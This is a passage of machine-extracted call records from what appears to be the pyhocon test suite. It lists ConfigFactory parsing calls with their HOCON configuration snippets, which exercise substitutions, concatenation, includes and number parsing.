}\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic} { cluster-size = 9, opts = "-Xmx4g" }\n """\n )\n', (16164, 16366), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((16590, 16854), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic}\n data-center-east-prod = ${data-center-east} {tmpDir=/tmp}\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic}\n data-center-east-prod = ${data-center-east} {tmpDir=/tmp}\n """\n )\n', (16616, 16854), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((17153, 17380), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = ${data-center-generic}\n data-center-east = { name = "east" }\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 
6 }\n data-center-east = ${data-center-generic}\n data-center-east = { name = "east" }\n """\n )\n', (17179, 17380), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((17529, 17756), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = { name = "east" }\n data-center-east = ${data-center-generic}\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 6 }\n data-center-east = { name = "east" }\n data-center-east = ${data-center-generic}\n """\n )\n', (17555, 17756), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((17960, 17999), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""foo = bar"""'], {}), "('foo = bar')\n", (17986, 17999), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18111, 18150), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""foo = "5\\""""'], {}), '(\'foo = "5"\')\n', (18137, 18150), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18267, 18310), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""foo = ""\\"5""\\""""'], {}), '(\'foo = """5"""\')\n', (18293, 18310), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18410, 18447), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""foo = 5"""'], {}), "('foo = 5')\n", (18436, 18447), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18547, 18586), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""foo = 5.0"""'], {}), "('foo = 5.0')\n", (18573, 18586), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18680, 18840), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [php, python]\n host_modules = ${common_modules} [java]\n """'], {}), '(\n """\n common_modules = [php, python]\n host_modules = ${common_modules} [java]\n """\n )\n', (18706, 18840), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18944, 19104), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [php, python]\n host_modules = [java] ${common_modules}\n """'], {}), '(\n """\n common_modules = [php, python]\n host_modules = [java] ${common_modules}\n """\n )\n', (18970, 19104), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((19209, 19376), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [php, python]\n host_modules = [java] ${common_modules} [perl]\n """'], {}), '(\n """\n common_modules = [php, python]\n host_modules = [java] ${common_modules} [perl]\n """\n )\n', (19235, 19376), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((19555, 19777), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [php, python]\n host_modules = [java] ${common_modules} [perl]\n full_modules = ${host_modules} [c, go]\n """'], {}), '(\n """\n common_modules = [php, python]\n host_modules = [java] ${common_modules} [perl]\n full_modules = ${host_modules} [c, go]\n """\n 
)\n', (19581, 19777), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((20092, 20238), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n main_language = php\n languages = [java, ${main_language}]\n """'], {}), '(\n """\n main_language = php\n languages = [java, ${main_language}]\n """\n )\n', (20118, 20238), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((20378, 20654), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n application.foo = 128mm\n application.large-jvm-opts = ["-XX:+UseParNewGC"] [-Xm16g, ${application.foo}]\n application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ["-XX:+UseParNewGC"]\n """'], {}), '(\n """\n application.foo = 128mm\n application.large-jvm-opts = ["-XX:+UseParNewGC"] [-Xm16g, ${application.foo}]\n application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ["-XX:+UseParNewGC"]\n """\n )\n', (20404, 20654), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((21025, 21387), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n application.foo = 128mm\n application.default-jvm-opts = ["-XX:+UseParNewGC"]\n application.large-jvm-opts = ${application.default-jvm-opts} [-Xm16g, ${application.foo}]\n application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ${application.default-jvm-opts}\n """'], {}), '(\n """\n application.foo = 128mm\n application.default-jvm-opts = ["-XX:+UseParNewGC"]\n application.large-jvm-opts = ${application.default-jvm-opts} [-Xm16g, ${application.foo}]\n application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ${application.default-jvm-opts}\n """\n )\n', (21051, 21387), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((24172, 24344), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = [1,2]\n x = ${x} [3,4]\n x = [-1, 0] ${x} [5, 6]\n x = [-3, -2] ${x}\n """'], {}), '(\n """\n x = [1,2]\n x = ${x} [3,4]\n x = [-1, 0] ${x} [5, 6]\n x = [-3, -2] ${x}\n """\n )\n', (24198, 24344), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((24481, 24578), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = [1,2]\n x += [3,4]\n """'], {}), '(\n """\n x = [1,2]\n x += [3,4]\n """)\n', (24507, 24578), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((24794, 24887), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = abc\n x += def\n """'], {}), '(\n """\n x = abc\n x += def\n """)\n', (24820, 24887), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((25089, 25157), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x += def\n """'], {}), '("""\n x += def\n """)\n', (25115, 25157), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((25289, 25359), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x += [1,2]\n """'], {}), '("""\n x += [1,2]\n """)\n', (25315, 25359), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((25480, 25579), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = {a: 1}\n x += {b: 2}\n """'], {}), '(\n """\n x = {a: 
1}\n x += {b: 2}\n """)\n', (25506, 25579), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((25717, 25788), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x += {a: 1}\n """'], {}), '("""\n x += {a: 1}\n """)\n', (25743, 25788), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((25928, 26087), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = [1,2]\n x = {x: [3,4]}\n x = {y: [5,6]}\n x = {z: ${x}}\n """'], {}), '(\n """\n x = [1,2]\n x = {x: [3,4]}\n x = {y: [5,6]}\n x = {z: ${x}}\n """\n )\n', (25954, 26087), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((26324, 26437), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = {x: [3,4]}\n x = [${x}, 2, 3]\n """'], {}), '(\n """\n x = {x: [3,4]}\n x = [${x}, 2, 3]\n """\n )\n', (26350, 26437), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((26650, 26753), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = {y: {z: 1}}\n x = ${x.y}\n """'], {}), '(\n """\n x = {y: {z: 1}}\n x = ${x.y}\n """)\n', (26676, 26753), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((26991, 27094), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = {y: {y: 1}}\n x = ${x.y}\n """'], {}), '(\n """\n x = {y: {y: 1}}\n x = ${x.y}\n """)\n', (27017, 27094), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((27824, 27972), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n foo : { a : { c : 1 } }\n foo : ${foo.a}\n foo : { a : 2 }\n """'], {}), '(\n """\n foo : { a : { c : 1 } }\n foo : ${foo.a}\n foo : { a : 2 }\n """\n )\n', (27850, 27972), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((28220, 28366), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n bar : {\n foo : 42,\n baz : ${bar.foo}\n }\n """'], {}), '(\n """\n bar : {\n foo : 42,\n baz : ${bar.foo}\n }\n """\n )\n', (28246, 28366), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((28630, 28811), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n bar : {\n foo : 42,\n baz : ${bar.foo}\n }\n bar : { foo : 43 }\n """'], {}), '(\n """\n bar : {\n foo : 42,\n baz : ${bar.foo}\n }\n bar : { foo : 43 }\n """\n )\n', (28656, 28811), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((29082, 29347), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n // bar.a should end up as 4\n bar : { a : ${foo.d}, b : 1 }\n bar.b = 3\n // foo.c should end up as 3\n foo : { c : ${bar.b}, d : 2 }\n foo.d = 4\n """'], {}), '(\n """\n // bar.a should end up as 4\n bar : { a : ${foo.d}, b : 1 }\n bar.b = 3\n // foo.c should end up as 3\n foo : { c : ${bar.b}, d : 2 }\n foo.d = 4\n """\n )\n', (29108, 29347), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((29657, 29729), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = ${?a}foo\n """'], {}), '("""\n a = ${?a}foo\n """)\n', (29683, 29729), False, 'from pyhocon import 
ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((30178, 30356), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = {a: 1, b: 2}\n x = ${x} {c: 3}\n x = {z: 0} ${x}\n x = {y: -1} ${x} {d: 4}\n """'], {}), '(\n """\n x = {a: 1, b: 2}\n x = ${x} {c: 3}\n x = {z: 0} ${x}\n x = {y: -1} ${x} {d: 4}\n """\n )\n', (30204, 30356), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((30506, 30765), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a.b = 3\n a.b = ${a.b}\n a.b = ${a.b}\n a.c = [1,2]\n a.c = ${a.c}\n a.d = {foo: bar}\n a.d = ${a.d}\n\n """'], {}), '(\n """\n a.b = 3\n a.b = ${a.b}\n a.b = ${a.b}\n a.c = [1,2]\n a.c = ${a.c}\n a.d = {foo: bar}\n a.d = ${a.d}\n\n """\n )\n', (30532, 30765), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((30918, 31057), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = perl java python\n """'], {}), '(\n """\n common_modules = perl java python\n """\n )\n', (30944, 31057), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((31257, 31402), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl] [java] [python]\n """'], {}), '(\n """\n common_modules = [perl] [java] [python]\n """\n )\n', (31283, 31402), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((31551, 31702), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = {a:perl} {b:java} {c:python}\n """'], {}), '(\n """\n common_modules = {a:perl} {b:java} {c:python}\n """\n )\n', (31577, 31702), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((31866, 31914), 'pyhocon.ConfigFactory.parse_URL', 'ConfigFactory.parse_URL', (['"""file:samples/aws.conf"""'], {}), "('file:samples/aws.conf')\n", (31889, 31914), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((32121, 32165), 'pyhocon.ConfigFactory.parse_URL', 'ConfigFactory.parse_URL', (['"""https://nosuchurl"""'], {}), "('https://nosuchurl')\n", (32144, 32165), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((32258, 32306), 'pyhocon.ConfigFactory.parse_file', 'ConfigFactory.parse_file', (['"""samples/animals.conf"""'], {}), "('samples/animals.conf')\n", (32282, 32306), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((32499, 32551), 'pyhocon.ConfigFactory.parse_file', 'ConfigFactory.parse_file', (['"""samples/all_animals.conf"""'], {}), "('samples/all_animals.conf')\n", (32523, 32551), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((32752, 32801), 'pyhocon.ConfigFactory.parse_file', 'ConfigFactory.parse_file', (['"""samples/all_bars.conf"""'], {}), "('samples/all_bars.conf')\n", (32776, 32801), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((33184, 33332), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: [\n {a: 1, b: 2},\n {a: 3, c: 4},\n ]\n """'], {}), '(\n """\n a: [\n {a: 1, b: 2},\n {a: 3, c: 4},\n ]\n """\n )\n', (33210, 33332), False, 'from pyhocon import ConfigFactory, 
ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((33498, 33632), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: [\n [1, 2]\n [3, 4]\n ]\n """'], {}), '(\n """\n a: [\n [1, 2]\n [3, 4]\n ]\n """\n )\n', (33524, 33632), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((33789, 34006), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b = {f: 4}\n a: [\n ${b} {a: 1, b: 2},\n {a: 3, c: 4} ${b},\n {a: 3} ${b} {c: 6},\n ]\n """'], {}), '(\n """\n b = {f: 4}\n a: [\n ${b} {a: 1, b: 2},\n {a: 3, c: 4} ${b},\n {a: 3} ${b} {c: 6},\n ]\n """\n )\n', (33815, 34006), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((34237, 34439), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b = [5, 6]\n a: [\n ${b} [1, 2]\n [3, 4] ${b}\n [1, 2] ${b} [7, 8]\n ]\n """'], {}), '(\n """\n b = [5, 6]\n a: [\n ${b} [1, 2]\n [3, 4] ${b}\n [1, 2] ${b} [7, 8]\n ]\n """\n )\n', (34263, 34439), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((36391, 36551), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: [\n include "dummy.txt"\n 3\n 4\n ]\n """'], {}), '(\n """\n a: [\n include "dummy.txt"\n 3\n 4\n ]\n """\n )\n', (36417, 36551), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((36662, 36834), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a {\n include required("samples/animals.d/cat.conf")\n t = 2\n }\n """'], {}), '(\n """\n a {\n include required("samples/animals.d/cat.conf")\n t = 2\n }\n """\n )\n', (36688, 36834), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((37070, 37248), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a {\n include required(file("samples/animals.d/cat.conf"))\n t = 2\n }\n """'], {}), '(\n """\n a {\n include required(file("samples/animals.d/cat.conf"))\n t = 2\n }\n """\n )\n', (37096, 37248), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((37668, 37729), 'pyhocon.ConfigParser.resolve_package_path', 'ConfigParser.resolve_package_path', (['"""pyhocon:config_parser.py"""'], {}), "('pyhocon:config_parser.py')\n", (37701, 37729), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((37745, 37765), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (37759, 37765), False, 'import os\n'), ((38170, 38188), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (38186, 38188), False, 'import tempfile\n'), ((41441, 41527), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n include-database=true\n """'], {}), '(\n """\n include-database=true\n """)\n', (41467, 41527), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((41671, 42078), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n database {\n host = localhost\n port = 5432\n user = people\n name = peopledb\n pass = peoplepass\n }\n\n user=test_user\n pass=test_pass\n\n database {\n user = ${user}\n pass = ${pass}\n }\n\n """'], {}), '(\n """\n database {\n host = localhost\n port = 5432\n user = people\n name = peopledb\n pass = peoplepass\n }\n\n user=test_user\n 
pass=test_pass\n\n database {\n user = ${user}\n pass = ${pass}\n }\n\n """\n )\n', (41697, 42078), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((42256, 42492), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n database {\n name = peopledb\n pass = peoplepass\n name = ${?NOT_EXISTS}\n pass = ${?NOT_EXISTS}\n }\n """'], {}), '(\n """\n database {\n name = peopledb\n pass = peoplepass\n name = ${?NOT_EXISTS}\n pass = ${?NOT_EXISTS}\n }\n """\n )\n', (42282, 42492), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((42674, 42866), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: 1\n b: foo\n c: ${a} ${b}\n c: ${b} ${a}\n d: ${a} ${b}\n d: ${a} bar\n """'], {}), '(\n """\n a: 1\n b: foo\n c: ${a} ${b}\n c: ${b} ${a}\n d: ${a} ${b}\n d: ${a} bar\n """\n )\n', (42700, 42866), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((43014, 43277), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n database {\n name = peopledb\n pass = peoplepass\n }\n\n database {\n name = ${?user}\n pass = ${?pass}\n }\n\n """'], {}), '(\n """\n database {\n name = peopledb\n pass = peoplepass\n }\n\n database {\n name = ${?user}\n pass = ${?pass}\n }\n\n """\n )\n', (43040, 43277), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((43452, 43567), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n foo: 42\n foo: ${?a}\n """'], {'resolve': '(False)'}), '(\n """\n foo: 42\n foo: ${?a}\n """, resolve\n =False)\n', (43478, 43567), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((43588, 43653), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b: 14\n """'], {}), '("""\n b: 14\n """)\n', (43614, 43653), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((43898, 43931), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""c=5"""'], {}), "('c=5')\n", (43924, 43931), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((43950, 44001), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""b=${c}"""'], {'resolve': '(False)'}), "('b=${c}', resolve=False)\n", (43976, 44001), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((44274, 44480), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 45\n b = ${?c}\n d = ${?c} 4\n e = ${?a}\n g = ${?c1} ${?c2}\n h = ${?c1} ${?c2} 1\n """'], {}), '(\n """\n a = 45\n b = ${?c}\n d = ${?c} 4\n e = ${?a}\n g = ${?c1} ${?c2}\n h = ${?c1} ${?c2} 1\n """\n )\n', (44300, 44480), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((44716, 44890), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n num = 3\n retries_msg = You have ${num} retries\n retries_msg = ${?CUSTOM_MSG}\n """'], {}), '(\n """\n num = 3\n retries_msg = You have ${num} retries\n retries_msg = ${?CUSTOM_MSG}\n """\n )\n', (44742, 44890), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((45315, 45492), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a 
=\n 4\n\n b = # test\n # test2\n 5\n\n c =\n\n 6\n """'], {}), '(\n """\n a =\n 4\n\n b = # test\n # test2\n 5\n\n c =\n\n 6\n """\n )\n', (45341, 45492), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((45650, 45806), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n short = 12\n long = 12321321837612378126213217321\n negative = -15\n """'], {}), '(\n """\n short = 12\n long = 12321321837612378126213217321\n negative = -15\n """\n )\n', (45676, 45806), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((46189, 46334), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 121.22\n b = -121.22\n c = .54\n d = -.54\n """'], {}), '(\n """\n a = 121.22\n b = -121.22\n c = .54\n d = -.54\n """\n )\n', (46215, 46334), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((46687, 46911), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n short = 12.12321\n long1 = 121.22E3423432\n neg_long1 = 121.22E-1\n long2 = 121.22e3423432\n neg_long2 = 121.22e-3\n """'], {}), '(\n """\n short = 12.12321\n long1 = 121.22E3423432\n neg_long1 = 121.22E-1\n long2 = 121.22e3423432\n neg_long2 = 121.22e-3\n """\n )\n', (46713, 46911), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((47304, 47487), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a =\n "a"\n\n b = # test\n # test2\n "b"\n\n c =\n\n "c"\n """'], {}), '(\n """\n a =\n "a"\n\n b = # test\n # test2\n "b"\n\n c =\n\n "c"\n """\n )\n', (47330, 47487), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((47669, 47964), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a =\n [\n 1,\n 2,\n ]\n\n b = # test\n # test2\n [\n 3,\n 4,]\n\n c =\n\n [\n 5,\n 6\n ]\n """'], {}), '(\n """\n a =\n [\n 1,\n 2,\n ]\n\n b = # test\n # test2\n [\n 3,\n 4,]\n\n c =\n\n [\n 5,\n 6\n ]\n """\n )\n', (47695, 47964), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((48155, 48462), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a =\n [\n "a",\n "b",\n ]\n\n b = # test\n # test2\n [\n "c",\n "d",]\n\n c =\n\n [\n "e",\n "f"\n ]\n """'], {}), '(\n """\n a =\n [\n "a",\n "b",\n ]\n\n b = # test\n # test2\n [\n "c",\n "d",]\n\n c =\n\n [\n "e",\n "f"\n ]\n """\n )\n', (48181, 48462), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((48681, 48994), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a =\n {\n a: 1,\n b: 2,\n }\n\n b = # test\n # test2\n {\n c: 3,\n d: 4,}\n\n c =\n\n {\n e: 5,\n f: 6\n }\n """'], {}), '(\n """\n a =\n {\n a: 1,\n b: 2,\n }\n\n b = # test\n # test2\n {\n c: 3,\n d: 4,}\n\n c =\n\n {\n e: 5,\n f: 6\n }\n """\n )\n', (48707, 48994), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((49229, 49536), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a\n {\n a: 1,\n b: 2,\n }\n\n b # test\n # test2\n {\n c: 3,\n d: 4,}\n\n c\n\n {\n e: 5,\n f: 6\n }\n """'], {}), '(\n """\n a\n {\n a: 1,\n b: 2,\n }\n\n b # test\n # test2\n {\n c: 3,\n d: 4,}\n\n c\n\n {\n e: 5,\n f: 6\n }\n """\n )\n', (49255, 49536), False, 'from pyhocon 
import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((49753, 49873), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 123\n a = ${?test}\n a = 5\n """'], {}), '(\n """\n a = 123\n a = ${?test}\n a = 5\n """\n )\n', (49779, 49873), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((49939, 50372), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n database {\n host = "localhost"\n port = 8000\n url = ${database.host}":"${database.port}\n }\n\n database {\n host = ${?DB_HOST}\n }\n\n database {\n host = "other.host.net"\n port = 433\n }\n }\n """'], {}), '(\n """\n {\n database {\n host = "localhost"\n port = 8000\n url = ${database.host}":"${database.port}\n }\n\n database {\n host = ${?DB_HOST}\n }\n\n database {\n host = "other.host.net"\n port = 433\n }\n }\n """\n )\n', (49965, 50372), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((50637, 50768), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = {\n b: 1\n c: 2\n }\n """'], {}), '(\n """\n a = {\n b: 1\n c: 2\n }\n """\n )\n', (50663, 50768), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((50800, 50892), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a.b = 4\n a.d = 3\n """'], {}), '(\n """\n a.b = 4\n a.d = 3\n """)\n', (50826, 50892), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((51082, 51151), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n name: foo\n """'], {}), '("""\n name: foo\n """)\n', (51108, 51151), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((51193, 51299), 